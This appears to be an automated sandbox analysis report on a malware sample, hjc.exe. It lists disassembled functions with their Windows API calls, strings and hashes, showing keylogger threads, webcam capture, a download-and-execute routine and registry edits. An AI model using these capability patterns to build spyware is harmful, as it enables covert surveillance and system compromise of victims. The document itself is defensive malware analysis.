                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: H_prologSleep
                                                                                                                                                                                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                                                                                                    • API String ID: 3469354165-3547787478
                                                                                                                                                                                    • Opcode ID: 07923d21a44b8173b1731ec10138cdb00cc0fb19cd0e2e790a16424caeda01b7
                                                                                                                                                                                    • Instruction ID: 5c1ec09d3764b370b80704e9e3ab93c32bf4cb42ec09f2273fca9406267bb23d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 07923d21a44b8173b1731ec10138cdb00cc0fb19cd0e2e790a16424caeda01b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: CD51D57BB082275BCA14EF39C8D4A5E7FA6AFC1690F400D18E80697680FF21B905C792
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CE9365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,15CFF234), ref: 15CE93CF
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,15D12764,000000FF,00000000,0000003F,00000000,?,?), ref: 15CE9447
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,15D127B8,000000FF,?,0000003F,00000000,?), ref: 15CE9474
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE93BD
                                                                                                                                                                                      • Part of subcall function 15CE6782: HeapFree.KERNEL32(00000000,00000000), ref: 15CE6798
                                                                                                                                                                                      • Part of subcall function 15CE6782: GetLastError.KERNEL32(?,?,15CF0C6F,?,00000000,?,00000000,?,15CF0F13,?,00000007,?,?,15CF145E,?,?), ref: 15CE67AA
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE9589
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1286116820-0
                                                                                                                                                                                    • Opcode ID: 630428eee6c87c64c2e8d2e87122e8677a809637cea34442144a29f283f7182c
                                                                                                                                                                                    • Instruction ID: 122096dd11adbf421249cd4085744d750539918776faef83723664f63785a3f8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 630428eee6c87c64c2e8d2e87122e8677a809637cea34442144a29f283f7182c
                                                                                                                                                                                    • Instruction Fuzzy Hash: C75177B6D04215ABCB10DFA9DCC09DFBBB8FF45650B100A6AE55597290EF34AA42CB50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CE3DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                    • Opcode ID: 743a926e7286c1f3a5a8bf8fc54880547c608728fdcc0d3d0c855400f6e7f81b
                                                                                                                                                                                    • Instruction ID: 792d982fc9877d3c9ea55ddf034ad23d4915c9c479fc5a28cc76e52635d97fa0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 743a926e7286c1f3a5a8bf8fc54880547c608728fdcc0d3d0c855400f6e7f81b
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2418036E003119FCB14CF78C881A5EBBB6FF89B14F1549A9EA15EB340DA71B901CB80
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CBC3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 15CBC430
                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,15CBC510,00000000,00000000), ref: 15CBC44D
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CBC459
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,15CA6F85,00000000), ref: 15CBC46A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CBC477
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1852769593-0
                                                                                                                                                                                    • Opcode ID: f5d1a5b407b8ee2708cd15b9a0e361f819a77750cc464d5508b34c451834f807
                                                                                                                                                                                    • Instruction ID: 1fda21c0696ec0a8de385227290a618e41f27342a9fc0a298905d423aea10836
                                                                                                                                                                                    • Opcode Fuzzy Hash: f5d1a5b407b8ee2708cd15b9a0e361f819a77750cc464d5508b34c451834f807
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F112F722141237FE6048E65DCC9EB7779DFB42AF4F004A2AF151C21C0CBA18D048E72
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CE8299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,15CDBC87,00000000,?,?,15CDBD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 15CE829E
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE82D3
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE82FA
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 15CE8307
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 15CE8310
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                    • Opcode ID: 23ab138de4e0dcef8bb41820877636e4d95fcff65acc6956095d2367c4060c1b
                                                                                                                                                                                    • Instruction ID: 1feebac61c24c6c4f6707be488598fe4d52b9069f6f2e6b87fc6f61c4f2d9bd1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 23ab138de4e0dcef8bb41820877636e4d95fcff65acc6956095d2367c4060c1b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F01A43FA15B516BC7065E755CC4E8B3E6BEBC26717200D29FC15A2290EF75AC4582A0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323AA0C Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,0323AAA3,?,?,00000000), ref: 0323AA24
                                                                                                                                                                                      • Part of subcall function 0323A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0323A79E
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0323AAA3,?,?,00000000), ref: 0323AA54
                                                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000004), ref: 0323AA5F
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0323AAA3,?,?,00000000), ref: 0323AA7D
                                                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A994,00000000,00000000,00000003), ref: 0323AA88
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4102113445-0
                                                                                                                                                                                    • Opcode ID: b27b3ceb23bc006832c6950b86b5b66bdc9f58b7ab37331a52acbec538c5cc31
                                                                                                                                                                                    • Instruction ID: f269a9451c09d8ed094797d1557a6938bad734733e04d76ac91f1ef6f3febd33
                                                                                                                                                                                    • Opcode Fuzzy Hash: b27b3ceb23bc006832c6950b86b5b66bdc9f58b7ab37331a52acbec538c5cc31
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4501F7FA2607887FE701EF78CD12B5E726CDB47620F5101B0E450AA6C0D6A4DE8146A4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CBC1DD Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 15CBC1F5
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 15CBC208
                                                                                                                                                                                    • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 15CBC228
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CBC233
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CBC23B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2951400881-0
                                                                                                                                                                                    • Opcode ID: 8e4d44e728ba2c68751a07969ff5a4609fa6785dabab8561784e9e7ae3469c72
                                                                                                                                                                                    • Instruction ID: 10170be35f5ecca6b775969b3a611165d507df3c9c9b2b4636c0bdc909f38d39
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e4d44e728ba2c68751a07969ff5a4609fa6785dabab8561784e9e7ae3469c72
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C0126B62802276BDA009ED4CC88FA7B27CEB84AC5F000052FA05C3190EFA09C41CAB2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CF09BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF09D4
                                                                                                                                                                                      • Part of subcall function 15CE6782: HeapFree.KERNEL32(00000000,00000000), ref: 15CE6798
                                                                                                                                                                                      • Part of subcall function 15CE6782: GetLastError.KERNEL32(?,?,15CF0C6F,?,00000000,?,00000000,?,15CF0F13,?,00000007,?,?,15CF145E,?,?), ref: 15CE67AA
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF09E6
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF09F8
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0A0A
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0A1C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 3271039a35e4cd5048c85130796a042a55e45005baafabf093f8f1b238f84633
                                                                                                                                                                                    • Instruction ID: f3efa475433ebd44126708ca8a6418b70793e55da073a0429b41ab1801123ae5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3271039a35e4cd5048c85130796a042a55e45005baafabf093f8f1b238f84633
                                                                                                                                                                                    • Instruction Fuzzy Hash: 73F0F43662922467C650DE6CE4C1D5A77E9FE00B127508D06E466E7600DE34FDC147A4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA6EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 15CA6FBC
                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 15CA70A0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadExecuteFileShell
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\hjc.exe$open
                                                                                                                                                                                    • API String ID: 2825088817-1832149388
                                                                                                                                                                                    • Opcode ID: 23df34abdc99f5c9dd8435bf32228c4266ec60a4081bf04f0482ccde45b3c06e
                                                                                                                                                                                    • Instruction ID: 7fc60cd1e3a818eac73117f9c48019c890f3afbeb3c2e4c30bd4af270e88b74f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 23df34abdc99f5c9dd8435bf32228c4266ec60a4081bf04f0482ccde45b3c06e
                                                                                                                                                                                    • Instruction Fuzzy Hash: B1617F3BB042035ACF14EE74CDA49AE7BE9AFD1590F800D1DA55757285FF24B909C3A2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323AABC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,0323AC8C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0323AAEB
                                                                                                                                                                                      • Part of subcall function 0323A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0323A79E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                                                                                                    • API String ID: 4232894706-1253427255
                                                                                                                                                                                    • Opcode ID: 159593ffdeac737ee529aca471548cb1c1f16afd227b631eb39d2c80c1180fd5
                                                                                                                                                                                    • Instruction ID: 0b8faffe7797943ebbfdec7ff5c192d925445788ed4c488ad4b5d6a41b0120d2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 159593ffdeac737ee529aca471548cb1c1f16afd227b631eb39d2c80c1180fd5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0341C5F87342054BC711FBAD89802BEF29BDB97200B5849B5D4C1CB354D6B8DDC29661
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA186A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142threadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 15CA18BE
                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 15CA18F6
                                                                                                                                                                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 15CA1A04
                                                                                                                                                                                      • Part of subcall function 15CD4770: __onexit.LIBCMT ref: 15CD4776
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                                    • String ID: 045
                                                                                                                                                                                    • API String ID: 1649129571-917703510
                                                                                                                                                                                    • Opcode ID: 8b9821fb9e9c989d867952adfd1b05a0e17adbfafdbd588d27a225a442d88bdd
                                                                                                                                                                                    • Instruction ID: 613c3063969a90db77143367b2ef3dbfe2e004adcf8a8773337e226dc4336a29
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b9821fb9e9c989d867952adfd1b05a0e17adbfafdbd588d27a225a442d88bdd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 29418F3B6143629AC714DF28DED4AAEBBA6AF80355F400D19E546861D0FF307946C752
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CBC9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SystemParametersInfoW.USER32 ref: 15CBCAD7
                                                                                                                                                                                      • Part of subcall function 15CB376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,15D0611C), ref: 15CB377E
                                                                                                                                                                                      • Part of subcall function 15CB376F: RegSetValueExA.ADVAPI32(15D0611C,?,00000000,?,00000000,00000000), ref: 15CB37A6
                                                                                                                                                                                      • Part of subcall function 15CB376F: RegCloseKey.ADVAPI32(15D0611C), ref: 15CB37B1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                    • API String ID: 4127273184-3576401099
                                                                                                                                                                                    • Opcode ID: 0bb3d98e240fce05b214ccd5507486f3453d9c9d8090e7b5e4a793f00e1b7b75
                                                                                                                                                                                    • Instruction ID: 6d445db041aa5fab1cadeab872ac42e113adf051d7e5b39b9f96e153f76dde94
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bb3d98e240fce05b214ccd5507486f3453d9c9d8090e7b5e4a793f00e1b7b75
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA1130B3B5421163D8047979CE67FAE2C16D352A91F800959E9023F7D6E8C35A5583E3
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CAA179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15CAA27D,15D150F0,00000000,00000000), ref: 15CAA1FE
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15CAA267,15D150F0,00000000,00000000), ref: 15CAA20E
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15CAA289,15D150F0,00000000,00000000), ref: 15CAA21A
                                                                                                                                                                                      • Part of subcall function 15CAB164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,15D150F0), ref: 15CAB172
                                                                                                                                                                                      • Part of subcall function 15CAB164: wsprintfW.USER32 ref: 15CAB1F3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                                    • String ID: Offline Keylogger Started
                                                                                                                                                                                    • API String ID: 465354869-4114347211
                                                                                                                                                                                    • Opcode ID: 4980b75d893fb65704e17cca312a1a92be48ec446345d1402672ba1534bfbb31
                                                                                                                                                                                    • Instruction ID: cb85aed1f9dd289d0a2ce3b87d3c8161981919842b8b36db71e79f9a55e8ce0a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4980b75d893fb65704e17cca312a1a92be48ec446345d1402672ba1534bfbb31
                                                                                                                                                                                    • Instruction Fuzzy Hash: 531151BB20021A7E9624BF79DC85CEB7E6DDA81198B400E19F94612141FE617D54CAF2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CAAEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 15CAB164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,15D150F0), ref: 15CAB172
                                                                                                                                                                                      • Part of subcall function 15CAB164: wsprintfW.USER32 ref: 15CAB1F3
                                                                                                                                                                                      • Part of subcall function 15CBB4EF: GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15CAA267,?,00000000,00000000), ref: 15CAAF6E
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15CAA289,?,00000000,00000000), ref: 15CAAF7A
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15CAA295,?,00000000,00000000), ref: 15CAAF86
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                                                    • String ID: Online Keylogger Started
                                                                                                                                                                                    • API String ID: 112202259-1258561607
                                                                                                                                                                                    • Opcode ID: 33ce1bb5587fd1e0054ca371d6c96205b542419c36a3f174c355cf05725858ef
                                                                                                                                                                                    • Instruction ID: 32d601e05b3ce32e4ea3c7c2397e66100670faa78fec954b1b91f245260fa7c7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 33ce1bb5587fd1e0054ca371d6c96205b542419c36a3f174c355cf05725858ef
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3001C4BA70026A3AE6247E798C89CBF7E6EDA81098B400D59F94612141FD923C49C7F2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA4F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
